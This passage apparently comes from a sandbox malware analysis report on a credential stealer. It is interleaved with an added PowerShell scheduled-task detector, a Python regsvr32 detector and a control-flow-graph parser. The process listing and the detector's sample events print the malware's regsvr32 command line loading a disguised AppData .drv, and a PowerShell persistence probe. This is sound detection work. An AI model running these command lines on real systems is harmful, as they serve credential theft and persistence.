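            if ($exe -ieq 'regsvr32' -and $argString -match '(?i)(^|\s)/i(:|\s|$)' -and
                $argString -notmatch '(?i)\.(dll|ocx)("|\s|$)') {
                $reasons.Add('regsvr32 /i: target does not carry a .dll/.ocx extension')
            }
            if ($Task.TaskName -match $EdgeTaskName -and $action.Execute -notmatch $EdgeUpdaterPath) {
                $reasons.Add('Edge-updater task name but the action is not MicrosoftEdgeUpdate.exe')
            }
        }

        foreach ($trigger in $Task.Triggers) {
            $interval = $trigger.Repetition.Interval     # ISO 8601 duration, e.g. PT1M
            if ($interval) {
                $span = [System.Xml.XmlConvert]::ToTimeSpan($interval)
                if ($elevated -and $span.TotalMinutes -le $MaxRepeatMinutes) {
                    $reasons.Add("RunLevel Highest with $interval repetition")
                }
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                TaskName  = $Task.TaskName
                TaskPath  = $Task.TaskPath
                Author    = $Task.Author
                Execute   = ($Task.Actions | ForEach-Object { $_.Execute }) -join ' ; '
                Arguments = ($Task.Actions | ForEach-Object { $_.Arguments }) -join ' ; '
                RunLevel  = $Task.Principal.RunLevel
                Reasons   = $reasons -join '; '
            }
        }
    }
}

# Usage: sweep every registered task on this host and list the hits.
Get-ScheduledTask | Find-SuspiciousScheduledTask | Format-List
```

Run against the task registered by Target 12, the function should report all four reasons: regsvr32 paired with an AppData argument, a /i: target with a .drv extension, an Edge-updater name whose action is plain regsvr32, and Highest run level with PT1M repetition. The repetition check is deliberately gated on the run level so that routine low-privilege tasks with short intervals do not flood the output; drop the $elevated condition if you want them too.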

                                                                            Target ID:13
                                                                            Start time:08:08:10
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:08:08:12
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
                                                                            Imagebase:0x7ff7b33d0000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:false

                                                                            Target ID:15
                                                                            Start time:08:08:13
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
                                                                            Imagebase:0x7ff74c1f0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:16
                                                                            Start time:08:08:13
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:17
                                                                            Start time:08:08:32
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                            Imagebase:0x7ff6dd940000
                                                                            File size:57'360 bytes
                                                                            MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false
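The process listing above shows the chain a SOC would hunt for: regsvr32.exe handed a module from %AppData% whose extension is .drv rather than .dll, an /i: install string forwarded to the module's DllInstall export, and a PowerShell child that only checks whether a scheduled task already runs that same regsvr32 command line (the persistence check behind the "Uses Register-ScheduledTask" signature). The following is an added example, not part of the Joe Sandbox report or of the sample's code: a small Python detector run over constructed process-creation events modelled on the listing. The event field names, the pid/ppid chain (the report does not show parent pids), the launching PowerShell process and the benign installer-driven regsvr32 used as a control are assumptions made for the example.

```python
"""Regsvr32 proxy-execution detector (added example, not from the report or the sample).

Rules mirror the signatures fired above: regsvr32 handed a module from a user-
writable path or with a non-DLL extension, regsvr32 launched by a script host,
a script host spawned by regsvr32, and a PowerShell one-liner that probes the
scheduler for a regsvr32 task. Event fields and the pid/ppid chain are assumed.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Locations a standard user can write to; genuine COM registrations point at
# Program Files or System32 instead.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\programdata\\|\\temp\\", re.I)
# Extensions regsvr32 is normally handed; a .drv/.dat/.txt here is a masquerading DLL.
EXPECTED_EXT = {".dll", ".ocx", ".ax"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
TOKEN = re.compile(r'"[^"]*"|\S+')   # keeps quoted paths together


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the process image
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(cmdline: str) -> list:
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def regsvr32_module(cmdline: str) -> tuple:
    """Return (module path, /i: install string or None) for a regsvr32 command line.

    The module is the last positional argument; the text after /i: is passed verbatim
    to the module's DllInstall export (here: 'SYNC'), so it is worth recording.
    """
    module: Optional[str] = None
    install: Optional[str] = None
    for tok in tokens(cmdline)[1:]:
        if tok[:1] in ("/", "-"):
            if tok[1:2].lower() == "i":
                install = tok[3:] if tok[2:3] == ":" else ""
        else:
            module = tok
    return module, install


def analyze(events: list) -> list:
    """Return (pid, rule) findings, in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name == "regsvr32.exe":
            module, _install = regsvr32_module(e.cmdline)
            if module:
                mbase = basename(module)
                ext = "." + mbase.rsplit(".", 1)[-1] if "." in mbase else ""
                if USER_WRITABLE.search(module) or ext not in EXPECTED_EXT:
                    findings.append((e.pid, "regsvr32_untrusted_module"))
            if pname in SCRIPT_HOSTS:
                findings.append((e.pid, "regsvr32_launched_by_script_host"))
        elif pname == "regsvr32.exe" and name in SCRIPT_HOSTS:
            findings.append((e.pid, "suspicious_child_of_regsvr32"))
        if name in ("powershell.exe", "pwsh.exe") and re.search(
                r"get-scheduledtask.*regsvr32", e.cmdline, re.I):
            findings.append((e.pid, "scheduled_task_probe_for_regsvr32"))
    return findings


# Constructed events modelled on the listing (pids 14, 15, 17 taken from the Target IDs;
# the launching PowerShell, the ppids and the benign installer-driven regsvr32 are invented).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell" -Command "regsvr32 /S /i:SYNC $env:APPDATA\netapi32_1.drv"'),
    ProcEvent(14, 100, r"C:\Windows\System32\regsvr32.exe",
              r"C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv"),
    ProcEvent(15, 14, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"'''),
    ProcEvent(17, 1, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
    ProcEvent(301, 1, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\msiexec.exe /V"),
    ProcEvent(300, 301, r"C:\Windows\System32\regsvr32.exe",
              r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Vendor\Tool\vendor.ocx"'),
]

if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Run against the constructed events, only pids 14 and 15 produce findings; the svchost BITS start and the control regsvr32 registering an .ocx from Program Files under msiexec stay silent. The path and extension checks are deliberately conservative: regsvr32 loading anything from a user-writable directory is rare enough in managed fleets to alert on, while the parent/child rules reproduce the two Sigma matches listed in the report's signature summary.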

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.928727861.0000000002391000.00000020.00000001.01000000.00000006.sdmp, Offset: 02390000, based on PE: true
                                                                              • Associated: 00000001.00000002.928699877.0000000002390000.00000002.00000001.01000000.00000006.sdmp
                                                                              • Associated: 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2390000_8n26gvrXUM.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                              • API String ID: 0-3031085480
                                                                              • Opcode ID: 970dd36a4f6eb9e2465c30397e50ad228eb4d7f0cb7f81d4f09e3288209c7f94
                                                                              • Instruction ID: 6769e830417df4758dde5a2f585a73f55d705d06c80448adfc8f41264e718c4d
                                                                              • Opcode Fuzzy Hash: 970dd36a4f6eb9e2465c30397e50ad228eb4d7f0cb7f81d4f09e3288209c7f94
                                                                              • Instruction Fuzzy Hash: 556269B56087059FCB08DF18C8E066ABBE1FF89304F044A6DE886CB74AE775D945CB81
                                                                              Strings
                                                                              • invalid distance too far back, xrefs: 0239163B
                                                                              • invalid distance code, xrefs: 02391650
                                                                              • invalid literal/length code, xrefs: 0239166A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.928727861.0000000002391000.00000020.00000001.01000000.00000006.sdmp, Offset: 02390000, based on PE: true
                                                                              • Associated: 00000001.00000002.928699877.0000000002390000.00000002.00000001.01000000.00000006.sdmp
                                                                              • Associated: 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_2390000_8n26gvrXUM.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                              • API String ID: 0-3255898291
                                                                              • Opcode ID: dc5778d7a03275b02984806eb66bd5b3500a2f5f1a2f917e5dbf5e18d15388b1
                                                                              • Instruction ID: 2b67994601ef2566fe81f0b20a5e4e8e9d4b1fb2327152dce6a5b16f68ce451d
                                                                              • Opcode Fuzzy Hash: dc5778d7a03275b02984806eb66bd5b3500a2f5f1a2f917e5dbf5e18d15388b1
                                                                              • Instruction Fuzzy Hash: B4E190716083868FCB08CF2CC590669FBE1EB86304F184A6DE8DAD7342E775D90ACB51

                                                                              Execution Graph

                                                                              Execution Coverage:3.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:23
                                                                              Total number of Limit Nodes:0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                              • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                              • API String ID: 3975177916-1077193248
                                                                              • Opcode ID: 5f271afe2ae9fccf6b5da3c282bb1f0fd7e512b2bed9e239f16a325d63dc81ec
                                                                              • Instruction ID: c0d9193c338d548185e6e9524ad3a75a5092939457380aa21ebe2440b55b40d9
                                                                              • Opcode Fuzzy Hash: 5f271afe2ae9fccf6b5da3c282bb1f0fd7e512b2bed9e239f16a325d63dc81ec
                                                                              • Instruction Fuzzy Hash: BD739362B19AD184EB74CF25D8A43FA2361FB46789F44413ACF4D9BB89DF3C9641A310
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeapmemcpy$AllocAttributesErrorFileLastMutex
                                                                              • String ID: $/i:S$SYNC$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                              • API String ID: 622075969-830671369
                                                                              • Opcode ID: 628fb525d60ea1f3f78cdf2688f5850ff5ec56705c0d7a82da2c21062ca54488
                                                                              • Instruction ID: 5569a01c6f991157a02261c07891e845f63c2a2d5909f9eedb4a0aa5fd731e4e
                                                                              • Opcode Fuzzy Hash: 628fb525d60ea1f3f78cdf2688f5850ff5ec56705c0d7a82da2c21062ca54488
                                                                              • Instruction Fuzzy Hash: B1F26172B0CAC280EA759B11E4907EBA361FB86780F444136DB8C87B9ADF7DD584DB50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$memcpymemset
                                                                              • String ID: :$called `Result::unwrap()` on an `Err` value
                                                                              • API String ID: 3399779480-2450422549
                                                                              • Opcode ID: ea0be7390e286caaa00e7880bc695e4b23e31b11e248fb54786aec96b10c7e47
                                                                              • Instruction ID: 996ba971ebd50a4943896cf99c184efdef6f08b63242ad6eb29740ee3b7d0798
                                                                              • Opcode Fuzzy Hash: ea0be7390e286caaa00e7880bc695e4b23e31b11e248fb54786aec96b10c7e47
                                                                              • Instruction Fuzzy Hash: 28234122A0DBC691FA758B14F4947EAB360FB96344F449229DBCC42699DF7CE2C4DB40

                                                                              Control-flow Graph (rendered image; only the node/edge list survived extraction and is omitted here)
                                                                              • Function at 7ffd3493eff0 in the regsvr32 snapshot; API nodes on the graph: GetCurrentProcessId, ProcessPrng, ReadFileEx, GetLastError, CloseHandle, SleepEx
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentPrng
                                                                              • String ID:
                                                                              • API String ID: 716580790-0
                                                                              • Opcode ID: 40dc5403d3e7f1c73b41867c1b58de82fda09004a7655f2a900109c1b82822c2
                                                                              • Instruction ID: bc6ec330fc3fb8291bb3f9e4169a6a44435c3c40e9b44282cc182def78a86829
                                                                              • Opcode Fuzzy Hash: 40dc5403d3e7f1c73b41867c1b58de82fda09004a7655f2a900109c1b82822c2
                                                                              • Instruction Fuzzy Hash: FF220422B04A828AEB648F25D8B03B92790FB46798F144239EF5E877DDDF3CD541A310

                                                                              Control-flow Graph (rendered image; only the node/edge list survived extraction and is omitted here)
                                                                              • Function at 7ffd348fa1b0 in the regsvr32 snapshot; API nodes on the graph: BCryptGenRandom, with SystemFunction036 (RtlGenRandom) reached on the failure branch as the fallback entropy source
                                                                              APIs
                                                                              • BCryptGenRandom.BCRYPT(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA1F2
                                                                              • SystemFunction036.ADVAPI32(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA205
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFunction036RandomSystem
                                                                              • String ID:
                                                                              • API String ID: 1232939966-0
                                                                              • Opcode ID: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction ID: 65d8aa66f8bd1c53f04c58e3a01a8d9f1d7b70b0aff3ba751c94dcb5592bb17f
                                                                              • Opcode Fuzzy Hash: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction Fuzzy Hash: 52F09053F0915905FE7516A63E945B580415F2ABF0D288335AE3AD7AD5AC2C6C863100

                                                                              Control-flow Graph

                                                                              control_flow_graph 2010 7ffd34931830-7ffd3493187b call 7ffd34940940 2013 7ffd34931a3f-7ffd34931a46 2010->2013 2014 7ffd34931881-7ffd349318b0 2010->2014 2017 7ffd34931a67-7ffd34931a7d 2013->2017 2015 7ffd349318b2 CloseHandle 2014->2015 2016 7ffd349318b7-7ffd34931907 2014->2016 2015->2016 2018 7ffd34931956-7ffd34931958 2016->2018 2019 7ffd34931909-7ffd3493190b 2016->2019 2020 7ffd34931999-7ffd349319a8 WaitForSingleObject 2018->2020 2021 7ffd3493195a-7ffd3493196d call 7ffd3493c570 2018->2021 2022 7ffd3493190d-7ffd3493191b call 7ffd3493f930 2019->2022 2023 7ffd34931978-7ffd3493198b call 7ffd3493c570 2019->2023 2026 7ffd349319ef-7ffd349319fd call 7ffd34992b0c 2020->2026 2027 7ffd349319aa-7ffd349319b9 GetLastError 2020->2027 2039 7ffd34931a7e-7ffd34931aaa call 7ffd3497c8b0 2021->2039 2040 7ffd34931973-7ffd34931976 2021->2040 2031 7ffd34931920-7ffd34931923 2022->2031 2042 7ffd34931991 2023->2042 2043 7ffd34931aac-7ffd34931ad3 call 7ffd3497c8b0 2023->2043 2041 7ffd34931a02-7ffd34931a04 2026->2041 2029 7ffd349319bb-7ffd349319c5 call 7ffd348efe90 2027->2029 2030 7ffd349319ca-7ffd349319d5 2027->2030 2029->2030 2037 7ffd349319d7-7ffd349319e1 call 7ffd348efe90 2030->2037 2038 7ffd349319e6-7ffd349319ed 2030->2038 2031->2020 2036 7ffd34931925-7ffd34931951 call 7ffd3497c8b0 2031->2036 2053 7ffd34931ad8-7ffd34931b3a call 7ffd348fd2f0 CloseHandle 2036->2053 2037->2038 2048 7ffd34931a26-7ffd34931a3a CloseHandle * 2 2038->2048 2039->2053 2049 7ffd34931994 CloseHandle 2040->2049 2041->2027 2050 7ffd34931a06-7ffd34931a22 2041->2050 2042->2049 2043->2053 2054 7ffd34931a48-7ffd34931a63 2048->2054 2055 7ffd34931a3c 2048->2055 2049->2020 2050->2048 2060 7ffd34931b4b-7ffd34931b52 2053->2060 2061 7ffd34931b3c-7ffd34931b46 call 7ffd348efe90 2053->2061 2054->2017 2055->2013 2063 7ffd34931b63-7ffd34931bcb call 7ffd348fdb90 CloseHandle * 2 call 7ffd34993140 call 7ffd34940940 2060->2063 2064 7ffd34931b54-7ffd34931b5e 
call 7ffd348efe90 2060->2064 2061->2060 2072 7ffd34931bcd-7ffd34931bd7 2063->2072 2073 7ffd34931bdc-7ffd34931bf3 2063->2073 2064->2063 2074 7ffd34931c74-7ffd34931c87 2072->2074 2075 7ffd34931bfe-7ffd34931c0d WaitForSingleObject 2073->2075 2076 7ffd34931bf5-7ffd34931bf9 CloseHandle 2073->2076 2077 7ffd34931c0f-7ffd34931c25 GetLastError 2075->2077 2078 7ffd34931c27-7ffd34931c3c GetExitCodeProcess 2075->2078 2076->2075 2079 7ffd34931c46-7ffd34931c5c CloseHandle * 2 2077->2079 2078->2077 2080 7ffd34931c3e-7ffd34931c44 2078->2080 2081 7ffd34931c5e-7ffd34931c61 CloseHandle 2079->2081 2082 7ffd34931c66-7ffd34931c6a 2079->2082 2080->2079 2081->2082 2082->2074 2083 7ffd34931c6c-7ffd34931c6f CloseHandle 2082->2083 2083->2074
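The control_flow_graph line above is a flat token stream rather than a picture: each basic block is a numeric id followed by its address range (a single address when the block is one instruction), then any imported API names it calls (`CloseHandle * 2` means two calls), any intra-module `call <addr>` targets, and `src->dst` tokens for the edges. The following parser is an added example and is not part of the Joe Sandbox report or its plugin; the sample input is an excerpt of the 7ffd34931830 graph shown above, trimmed to a subset of its blocks and to the edges between blocks in that subset. Running it recovers the API sequence a triager reads off the graph (here CloseHandle, WaitForSingleObject, GetLastError) and maps a `ref:` address from the APIs table back to the block that contains it.

```python
import re
from collections import Counter, defaultdict, deque
from dataclasses import dataclass, field

# Tokens copied from the 7ffd34931830 graph in this report, trimmed to a
# subset of its basic blocks and to the edges that connect blocks inside
# that subset (an excerpt, not the full graph).
SAMPLE_CFG = (
    "control_flow_graph 2010 7ffd34931830-7ffd3493187b call 7ffd34940940 "
    "2013 7ffd34931a3f-7ffd34931a46 2010->2013 2014 7ffd34931881-7ffd349318b0 "
    "2010->2014 2017 7ffd34931a67-7ffd34931a7d 2013->2017 "
    "2015 7ffd349318b2 CloseHandle 2014->2015 2016 7ffd349318b7-7ffd34931907 "
    "2014->2016 2015->2016 2018 7ffd34931956-7ffd34931958 2016->2018 "
    "2019 7ffd34931909-7ffd3493190b 2016->2019 "
    "2020 7ffd34931999-7ffd349319a8 WaitForSingleObject 2018->2020 "
    "2021 7ffd3493195a-7ffd3493196d call 7ffd3493c570 2018->2021 "
    "2022 7ffd3493190d-7ffd3493191b call 7ffd3493f930 2019->2022 "
    "2023 7ffd34931978-7ffd3493198b call 7ffd3493c570 2019->2023 "
    "2026 7ffd349319ef-7ffd349319fd call 7ffd34992b0c 2020->2026 "
    "2027 7ffd349319aa-7ffd349319b9 GetLastError 2020->2027 "
    "2038 7ffd349319e6-7ffd349319ed "
    "2048 7ffd34931a26-7ffd34931a3a CloseHandle * 2 2038->2048"
)

HEX = r"[0-9a-fA-F]+"
RANGE_RE = re.compile(rf"^({HEX})(?:-({HEX}))?$")   # "start" or "start-end"
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")               # "src->dst" block ids


@dataclass
class Block:
    id: int
    start: int
    end: int
    apis: list = field(default_factory=list)    # imported Win32 APIs called here
    calls: list = field(default_factory=list)   # intra-module call targets


def _is_address(tok):
    # Block ids and repeat counts are short decimals; the addresses in these
    # graphs are 12+ hex digits, so length alone separates the two.
    return bool(RANGE_RE.match(tok)) and len(tok.split("-")[0]) >= 8


def parse_cfg(text):
    """Turn one control_flow_graph token stream into (blocks, edges)."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks, edges, cur = {}, [], None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge[1]), int(edge[2])))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and _is_address(tokens[i + 1]):
            rng = RANGE_RE.match(tokens[i + 1])
            start = int(rng[1], 16)
            end = int(rng[2], 16) if rng[2] else start   # single-address block
            cur = blocks.setdefault(int(tok), Block(int(tok), start, end))
            i += 2
        elif cur is None:
            raise ValueError(f"token {tok!r} appears before any block header")
        elif tok == "call":                    # "call 7ffd34940940"
            cur.calls.append(int(tokens[i + 1], 16))
            i += 2
        elif tok == "*":                       # "CloseHandle * 2" repeat marker
            cur.apis.extend([cur.apis[-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        else:                                  # bare token: an imported API name
            cur.apis.append(tok)
            i += 1
    return blocks, edges


def api_histogram(blocks):
    """How often each imported API is called across the function's blocks."""
    return Counter(api for b in blocks.values() for api in b.apis)


def reachable_apis(blocks, edges, entry):
    """(block id, API) pairs in breadth-first order from the entry block."""
    if entry not in blocks:
        return []
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, queue, out = {entry}, deque([entry]), []
    while queue:
        bid = queue.popleft()
        out.extend((bid, api) for api in blocks[bid].apis)
        for nxt in succ[bid]:
            if nxt in blocks and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return out


def block_for_address(blocks, addr):
    """Map a 'ref:' address from the APIs table back to its basic block."""
    for b in blocks.values():
        if b.start <= addr <= b.end:
            return b.id
    return None
```

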